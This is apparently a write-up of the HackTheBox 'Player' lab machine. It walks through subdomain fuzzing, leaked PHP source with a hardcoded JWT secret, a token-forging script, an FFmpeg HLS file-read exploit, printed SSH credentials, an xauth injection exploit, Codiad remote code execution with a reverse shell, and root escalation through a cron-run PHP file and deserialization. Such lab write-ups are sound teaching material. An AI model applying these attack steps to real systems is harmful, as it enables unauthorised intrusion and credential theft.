HackTheBox - Player

Nmap scan results (All port scan)

This belongs to Trusty package that means no kind docker container involved.

Apache2

OpenSSH

Subdomain Enumeration using wfuzz

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hw 30 -H "Host: FUZZ.player.htb" 10.10.10.145

Adding the subdomains to /etc/hosts file.

Using gobuster to discover files and directories

dev.player.htb

chat.player.htb

staging.player.htb

player.htb

Found this on chat.player.htb which can be used for further exploitation.

Staging subdomain(staging.player.htb) - Exposing sensitive files

Main subdomain(player.htb) - Exposing source code for the main app

Discovering sensitive information on staging.player.htb

Error found on contact.php page: Database connection failed. Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php

Using gobuster's discover backup feature

gobuster dir -w custom_wordlist -u http://player.htb/launcher/ --discover-backup

#Code for dee8dc8a47256c64630d803a4c40786c.php
<?php
require 'vendor/autoload.php';

use \Firebase\JWT\JWT;

if(isset($_COOKIE["access"]))
{
	$key = '_S0_R@nd0m_P@ss_';
	$decoded = JWT::decode($_COOKIE["access"], base64_decode(strtr($key, '-_', '+/')), ['HS256']);
	if($decoded->access_code === "0E76658526655756207688271159624026011393")
	{
		header("Location: 7F2xxxxxxxxxxxxx/");
	}
	else
	{
		header("Location: index.html");
	}
}
else
{
	$token_payload = [
	  'project' => 'PlayBuff',
	  'access_code' => 'C0B137FE2D792459F26FF763CCE44574A5B5AB03'
	];
	$key = '_S0_R@nd0m_P@ss_';
	$jwt = JWT::encode($token_payload, base64_decode(strtr($key, '-_', '+/')), 'HS256');
	$cookiename = 'access';
	setcookie('access',$jwt, time() + (86400 * 30), "/");
	header("Location: index.html");
}

?>

Creating Forged JWT Token

Now that we have secret key for JWT, we can forge our own token. Let's create a PHP Script for this.

#Forged token script
<?php
require "vendor/autoload.php";
use \Firebase\JWT\JWT;

    $secret_Key = "_S0_R@nd0m_P@ss_";
    $token_payload = [
          'project' => 'PlayBuff',
          'access_code' => '0E76658526655756207688271159624026011393'
        ];
    echo JWT::encode(
        $token_payload,
        base64_decode(strtr($secret_Key, '-_', '+/')),
        'HS256'
    );
?>

After changing the access cookie, we got access to this page.

Exploiting FFmpeg HLS vulnerability

Looks like this website is vulnerable to FFmpeg HLS vulnerability. Read about this over here.

Get the gen_xbin_avi.py file and analyze it for better understanding. Let's run the script now.

Let's read the /var/www/backup/service_config file with this vulnerability.

Credentials found - telegen : d-bC|jC!2uepS/w

Let's use this credentials to connect to SSH Protocol. (Both 22 and 6686)

We are in a restricted shell where we can only run few commands like clear, exit, help, history, lpath and lsudo

There is nothing we can do now. Let's search for OpenSSH known vulnerabilities.

We can try using xauth Command Injection vulnerability. You can download the script using searchsploit -m multiple/remote/39569.py

Got credentials for peter : CQXpm\z)G5D#%S$y=

Let's try to login to Codiad running at dev.staging.htb

RCE on dev.staging.htb (CVE-2018-14009)

Change this part of the script to get Remote Code Execution, here we are using reverse shell script.

Let's run the script to get a reverse shell as www-data.

Privilege Escalation (Method 1)

Cron job is running as root and it is executing /var/lib/playbuff/buff.php file. Let's check the file and see if we can exploit it or not.

<?php
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
class playBuff
{
        public $logFile="/var/log/playbuff/logs.txt";
        public $logData="Updated";

        public function __wakeup()
        {
                file_put_contents(__DIR__."/".$this->logFile,$this->logData);
        }
}
$buff = new playBuff();
$serialbuff = serialize($buff);
$data = file_get_contents("/var/lib/playbuff/merge.log");
if(unserialize($data))
{
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success with serialized logs!';
        }
}
else
{
        file_put_contents("/var/lib/playbuff/merge.log","no issues yet");
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success!';
        }
}
?>

So there are two ways to exploit this, first is to include a malicious file and get root access and other one is de serialization vulnerability.

We have the privileges to read/write the /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php

So we can edit this file and place our malicious code in it and as soon as the cron job runs, this file will get executed.

This script will send us a ping request as soon as it gets executed.

Let's get a reverse shell now.

Privilege Escalation (Method 2)

Exploiting PHP De-serialization vulnerability

We have write privileges to /var/lib/playbuff/merge.log and the PHP script gets the data from merge.log file and performs a unserialize function call on that data.